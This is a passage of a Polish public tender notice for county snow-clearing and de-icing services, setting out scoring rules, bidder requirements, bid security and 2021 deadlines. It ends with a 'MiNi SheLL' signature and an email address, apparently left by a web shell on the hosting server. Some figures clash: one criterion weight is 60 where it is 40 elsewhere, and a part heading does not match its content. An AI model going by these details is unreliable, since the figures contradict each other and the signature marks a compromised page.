uzasadniona potrzeba i<br/>możliwość rozszerzenia zamówienia podstawowego oraz zostaną zapewnione środki finansowe na ten<br/>cel. Wysokość wynagrodzenia zamówienia polegającego na powtórzeniu podobnych usług zostanie<br/>ustalona w drodze negocjacji z Wykonawcą. Zamówienie zostanie udzielone dotychczasowemu<br/>Wykonawcy pod warunkiem, że: zapewni nie gorszy standard wykonywania nowego zamówienia niż<br/>podstawowego, przy zawieraniu umowy na zamówienie polegające na powtórzeniu podobnych usług –<br/>zaakceptuje istotne warunki umowy odnoszącej się do zamówienia podstawowego z uwzględnieniem<br/>różnic wynikających z wartości, czasu realizacji i innych istotnych okoliczności mających miejsce w chwili<br/>udzielania zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona wyboru najkorzystniejszej oferty, stosując<br/>następujące kryteria:<br/>• Cena – 60 pkt<br/>• Czas reakcji – 40 pkt<br/>2. Zasady oceny kryterium „Cena” (C)<br/>Kryterium „Cena”(C) - będzie rozpatrywana na podstawie ceny ofertowej brutto za wykonanie przedmiotu<br/>zamówienia wpisanej przez Wykonawcę w formularzu oferty. W tym kryterium można uzyskać<br/>maksymalnie 60 punktów (znaczenie w ocenie pkt = %). W przypadku kryterium „Cena”(C) - oferta<br/>otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikającą ze wzoru:<br/>C = [ Cmin: Co] x 60 pkt<br/>gdzie:<br/>C – ilość punktów jakie otrzyma badana oferta za kryterium „Cena”<br/>Cmin – cena najniższa spośród wszystkich ważnych i nieodrzuconych ofert<br/>Co – cena badanej oferty<br/>Ceny należy podać z dokładnością do dwóch miejsc po przecinku.<br/>3. Zasady oceny kryterium czasu reakcji<br/>Czas reakcji - wskaźnik R dla części 8 i 9 - czas dostarczenia materiału od zawiadomienia telefonicznego<br/>/ elektronicznego (e-mail, Fax) przez Zamawiającego<br/>R - liczba punktów uzyskanych przez ofertę w kryterium czasu dostarczenia materiału od zawiadomienia<br/>telefonicznego/elektronicznego (e-mail, Fax) przez Zamawiającego (max – 40 pkt.)<br/>R:<br/>0 pkt - w przypadku deklarowanego czasu dostarczenia materiału liczonego od zawiadomienia<br/>telefonicznego/elektronicznego(e-mail, Fax) przez Zamawiającego wynoszącego powyżej 48 godzin,<br/>20 pkt - w przypadku deklarowanego czasu dostarczenia materiału liczonego od zawiadomienia<br/>telefonicznego/elektronicznego(e-mail, Fax) przez Zamawiającego wynoszącego do 48 godzin,<br/>40 pkt - w przypadku deklarowanego czasu dostarczenia materiału liczonego od zawiadomienia<br/>telefonicznego/elektronicznego(e-mail, Fax) przez Zamawiającego wynoszącego do 24 godzin.<br/>W przypadku niedotrzymania zaoferowanego czasu dostarczenia materiału od zawiadomienia<br/>telefonicznego/elektronicznego (e-mail, Fax) Wykonawca zapłaci Zamawiającemu karę w wysokości<br/>500,00 zł za każde zdarzenie (nie dostarczenie materiału w zaoferowanym terminie) i 0,5 % wartości<br/>brutto opóźnionej dostawy, za każdy dzień opóźnienia.<br/>4. Za najkorzystniejszą ofertę zostanie uznana ta, która uzyska łącznie największą liczbę punktów (P)<br/>wyliczoną zgodnie ze wzorem:<br/>P= C + R<br/>gdzie:<br/>P – łączna liczba punktów oferty ocenianej<br/>C – liczba punktów uzyskanych w kryterium „Cena”<br/>R – liczba punktów uzyskanych w kryterium „Czas reakcji”<br/>Oferta w łącznej ocenie oferty może uzyskać maksymalnie 100 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 7 – Odśnieżanie podstawionym nośnikiem do pługa dwustronnego, samochód o ładowności 8-16 t (pług własność Zamawiającego, zawieszenie dostosowane do sam. Kamaz), </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie w okresie 3 lat od udzielenia zamówienia podstawowego,<br/>dotychczasowemu wykonawcy usług zamówienia, polegającego na powtórzeniu podobnych usług,<br/>stanowiących nie więcej niż 30% wartości zamówienia podstawowego, zgodnych z przedmiotem<br/>niniejszego zamówienia. Zamówienie zostanie udzielone, gdy zaistnieje uzasadniona potrzeba i<br/>możliwość rozszerzenia zamówienia podstawowego oraz zostaną zapewnione środki finansowe na ten<br/>cel. Wysokość wynagrodzenia zamówienia polegającego na powtórzeniu podobnych usług zostanie<br/>ustalona w drodze negocjacji z Wykonawcą. Zamówienie zostanie udzielone dotychczasowemu<br/>Wykonawcy pod warunkiem, że: zapewni nie gorszy standard wykonywania nowego zamówienia niż<br/>podstawowego, przy zawieraniu umowy na zamówienie polegające na powtórzeniu podobnych usług –<br/>zaakceptuje istotne warunki umowy odnoszącej się do zamówienia podstawowego z uwzględnieniem<br/>różnic wynikających z wartości, czasu realizacji i innych istotnych okoliczności mających miejsce w chwili<br/>udzielania zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona wyboru najkorzystniejszej oferty, stosując<br/>następujące kryteria:<br/>• Cena – 60 pkt<br/>• Czas reakcji – 40 pkt<br/>2. Zasady oceny kryterium „Cena” (C)<br/>Kryterium „Cena”(C) - będzie rozpatrywana na podstawie ceny ofertowej brutto za wykonanie przedmiotu<br/>zamówienia wpisanej przez Wykonawcę w formularzu oferty. W tym kryterium można uzyskać<br/>maksymalnie 60 punktów (znaczenie w ocenie pkt = %). W przypadku kryterium „Cena”(C) - oferta<br/>otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikającą ze wzoru:<br/>C = [ Cmin: Co] x 60 pkt<br/>gdzie:<br/>C – ilość punktów jakie otrzyma badana oferta za kryterium „Cena”<br/>Cmin – cena najniższa spośród wszystkich ważnych i nieodrzuconych ofert<br/>Co – cena badanej oferty<br/>Ceny należy podać z dokładnością do dwóch miejsc po przecinku.<br/>3. Zasady oceny kryterium czasu reakcji<br/>Czas reakcji - wskaźnik R dla części 8 i 9 - czas dostarczenia materiału od zawiadomienia telefonicznego<br/>/ elektronicznego (e-mail, Fax) przez Zamawiającego<br/>R - liczba punktów uzyskanych przez ofertę w kryterium czasu dostarczenia materiału od zawiadomienia<br/>telefonicznego/elektronicznego (e-mail, Fax) przez Zamawiającego (max – 40 pkt.)<br/>R:<br/>0 pkt - w przypadku deklarowanego czasu dostarczenia materiału liczonego od zawiadomienia<br/>telefonicznego/elektronicznego(e-mail, Fax) przez Zamawiającego wynoszącego powyżej 48 godzin,<br/>20 pkt - w przypadku deklarowanego czasu dostarczenia materiału liczonego od zawiadomienia<br/>telefonicznego/elektronicznego(e-mail, Fax) przez Zamawiającego wynoszącego do 48 godzin,<br/>40 pkt - w przypadku deklarowanego czasu dostarczenia materiału liczonego od zawiadomienia<br/>telefonicznego/elektronicznego(e-mail, Fax) przez Zamawiającego wynoszącego do 24 godzin.<br/>W przypadku niedotrzymania zaoferowanego czasu dostarczenia materiału od zawiadomienia<br/>telefonicznego/elektronicznego (e-mail, Fax) Wykonawca zapłaci Zamawiającemu karę w wysokości<br/>500,00 zł za każde zdarzenie (nie dostarczenie materiału w zaoferowanym terminie) i 0,5 % wartości<br/>brutto opóźnionej dostawy, za każdy dzień opóźnienia.<br/>4. Za najkorzystniejszą ofertę zostanie uznana ta, która uzyska łącznie największą liczbę punktów (P)<br/>wyliczoną zgodnie ze wzorem:<br/>P= C + R<br/>gdzie:<br/>P – łączna liczba punktów oferty ocenianej<br/>C – liczba punktów uzyskanych w kryterium „Cena”<br/>R – liczba punktów uzyskanych w kryterium „Czas reakcji”<br/>Oferta w łącznej ocenie oferty może uzyskać maksymalnie 100 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają określone przez<br/>Zamawiającego warunki udziału w postępowaniu, dotyczące:<br/>1. Zdolności do występowania w obrocie gospodarczym;<br/>• Zamawiający nie określa.<br/>2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to<br/>z odrębnych przepisów;<br/>• Zamawiający nie określa.<br/>3. Sytuacji ekonomicznej lub finansowej;<br/>• Zamawiający nie określa.<br/>4. Zdolności technicznej lub zawodowej;<br/>Zdolności technicznej lub zawodowej:<br/>A) Dysponowanie odpowiednim potencjałem technicznym;<br/>wykonawca na okres realizacji zamówienia musi dysponować jednostkami sprzętowymi i środkami<br/>transportu, na które składa swoja ofertę, tj.:<br/><br/>Dla części nr 4 – nośnik do pługa jednostronnego ładowność 8-16 t<br/>Dla części nr 5 – nośnik z pługiem PJ-10 samochód ładowności 8-16 t,<br/>Dla części nr 6 – pługo-piaskarka na samochodzie z napędem co najmniej na dwie osie o<br/>ładowności 8-16 t,<br/>Dla części nr 7 – nośnik do pługa dwustronnego, samochód o ładowności 8-16 (pług własność<br/>Zamawiającego zawieszenie dostosowane do sam. Kamaz),<br/>Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie dla część nr 8 i 9.<br/>W przypadku składania oferty na dwie lub więcej części Wykonawca musi wykazać się sumą<br/>warunków dla poszczególnych części.<br/>B) Dysponowanie osobami zdolnymi do wykonania zamówienia;<br/>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że w okresie realizacji zamówienia<br/>będzie dysponował min: osobami, które będą uczestniczyć w wykonywaniu zamówienia<br/>posiadającymi wymagane uprawnienia, tj.<br/>Dla części nr 4 – kierowca / operator (1 osoba) posiadający prawo jazdy odpowiedniej kategorii,<br/>uprawniania do kierowania sprzętem,<br/>Dla części nr 5 – kierowca / operator (1 osoba) posiadający prawo jazdy odpowiedniej kategorii,<br/>uprawniania do kierowania sprzętem,<br/>Dla części nr 6 – kierowca / operator (1 osoba) posiadający prawo jazdy odpowiedniej kategorii,<br/>uprawniania do kierowania sprzętem,<br/>Dla części nr 7 – kierowca / operator (1 osoba) posiadający prawo jazdy odpowiedniej kategorii,<br/>uprawniania do kierowania sprzętem,<br/><br/>W przypadku składania oferty na dwie lub więcej części Wykonawca musi wykazać się sumą<br/>warunków dla poszczególnych części.<br/>C) Posiadanie wiedzy i doświadczenia;<br/>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie wykonał co najmniej dwie usługi / dostawy porównywalne z przedmiotem zamówienia,<br/>polegające na zimowym utrzymaniu dróg publicznych, w tym co najmniej jednej na drodze o<br/>kategorii drogi powiatowej i wyższej tj.<br/>Dla części nr 4 – Odśnieżanie za pomocą nośnika z pługiem jednostronnym lub obustronnym -<br/>minimalna zrealizowana ilość godzin pracy dla jednej usługi: 25,<br/>Dla części nr 5 – Odśnieżanie za pomocą nośnika z pługiem jednostronnym lub obustronnym -<br/>minimalna zrealizowana ilość godzin pracy dla jednej usługi: 25,<br/>Dla części nr 6 – Zwalczanie śliskości oraz odśnieżanie pługo-piaskarką - minimalna zrealizowana<br/>ilość godzin pracy dla jednej usługi: 100,<br/>Dla części nr 7 – Odśnieżanie za pomocą nośnika z pługiem dwustronnym - minimalna<br/>zrealizowana ilość godzin pracy dla jednej usługi: 10,<br/><br/><br/>• W przypadku składania oferty na dwie lub więcej części Wykonawca musi wykazać się sumą<br/>warunków dla poszczególnych części.<br/>• W związku z art. 118 ust. 2 ustawy Pzp: „W odniesieniu do warunków dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów<br/>udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane.” <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków dowodowych na potwierdzenie<br/>niepodlegania wykluczeniu</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1. wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu<br/>wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami;<br/>(zgodnie z warunkiem określonym w pkt 6.1.4 lit. A) SWZ (wg proponowanego załącznika nr 5 do SWZ).<br/>2. Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności<br/>oraz informacją o podstawie do dysponowania tymi osobami; (zgodnie z warunkiem określonym w pkt<br/>6.1.4 lit. B) SWZ (wg proponowanego załącznika nr 4 do SWZ)<br/>3. Wykaz dostaw lub usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych<br/>również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w<br/>tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których<br/>dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy<br/>te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub<br/>usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a<br/>jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów -<br/>oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych<br/>referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w<br/>okresie ostatnich 3 miesięcy; (zgodnie z warunkiem określonym w pkt 6.1.4 lit. C) SWZ (wg<br/>proponowanego załącznika nr 3 do SWZ);<br/>UWAGA:<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji dostaw lub usług wykonywanych wspólnie z<br/>innymi wykonawcami, to wykaz o którym mowa w pkt 8.3.3., dotyczy dostaw lub usług, w których<br/>wykonaniu wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub<br/>ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy; (Zamawiający zastrzega<br/>możliwość zwrócenia się do wykonawcy o wyjaśnienia w zakresie faktycznie<br/>i konkretnie wykonywanego zakresu prac oraz przedstawienia stosownych dowodów np. umowy<br/>konsorcjum, z której wynika zakres obowiązków czy wystawionych przez wykonawcę faktur).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę składa się na Formularzu Ofertowym - zgodnie z załącznikiem nr 1 ROZDZIAŁU I do SWZ.<br/>Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>• oświadczenia, o których mowa w pkt 8.1 ROZDZIAŁU I SWZ;<br/>• zobowiązanie innego podmiotu, o którym mowa w 9 ROZDZIAŁU I SWZ (jeżeli dotyczy);<br/>• dowód wniesienia wadium (jeśli Zamawiający wymaga wadium);<br/>• dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli<br/>dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 14.1.	Wykonawca jest zobowiązany do wniesienia wadium w wysokości: <br/>	na Część nr 4 w wysokości nie dotyczy <br/>	na Część nr 5 w wysokości nie dotyczy <br/>	na Część nr 6 w wysokości 750,00 zł<br/>	na Część nr 7 nie dotyczy nie dotyczy <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia,<br/>o których mowa w pkt 8.1 ROZDZIAŁU I SWZ, składa każdy z Wykonawców. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim<br/>każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie,<br/>z którego wynika, które dostawy/usługi wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa<br/>każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 20. INFORMACJE O TREŚCI ZAWIERANEJ UMOWY ORAZ MOŻLIWOŚCI JEJ ZMIANY<br/>20.1. Umowa zostanie zawarta w wyznaczonym przez Zamawiającego terminie i miejscu.<br/>20.2. Zamawiający wymaga, aby Wykonawca zawarł z nim umowę na zasadach określonych we<br/>wzorze umowy, określonym w ROZDZIALE II SWZ.<br/>20.3. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na<br/>podstawie, której dokonano wyboru Wykonawcy, chyba że wystąpią okoliczności których nie można było wcześniej przewidzieć, a które przemawiają za koniecznością zmiany postanowień<br/>umowy określone we wzorze umowy zgodnie ROZDZIAŁEM II SWZ oraz art. 455 ustawy Pzp.<br/>20.4. Wykonawca zobowiązany jest wykazać zaistnienie okoliczności wskazanych we wzorze<br/>umowy poprzez przedłożenie stosownych ekspertyz, opinii, dokumentów, itp. z których będzie<br/>wynikać konieczność zmiany umowy.<br/>20.5. Wszelkie istotne zmiany treści umowy wymagają zgody obydwu stron i formy pisemnej w<br/>postaci aneksu pod rygorem nieważności.<br/>20.6. Wprowadzenie zmian nieistotnych w umowie wymagają formy pisemnej pod rygorem<br/>nieważności.<br/>20.7. Podpisanie aneksu do umowy wprowadzającego zmiany istotne powinno być poprzedzone,<br/>pod rygorem nieważności, sporządzeniem protokołu konieczności zawierającego uzasadnienie.<br/>20.8. Konsekwencją zmiany umowy (aneksowania) może być w szczególności zmiana terminu<br/>zakończenia realizacji zadania, wydłużenie terminów obowiązywania zabezpieczenia należytego<br/>wykonania umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/zdp_lezajsk</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-18 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com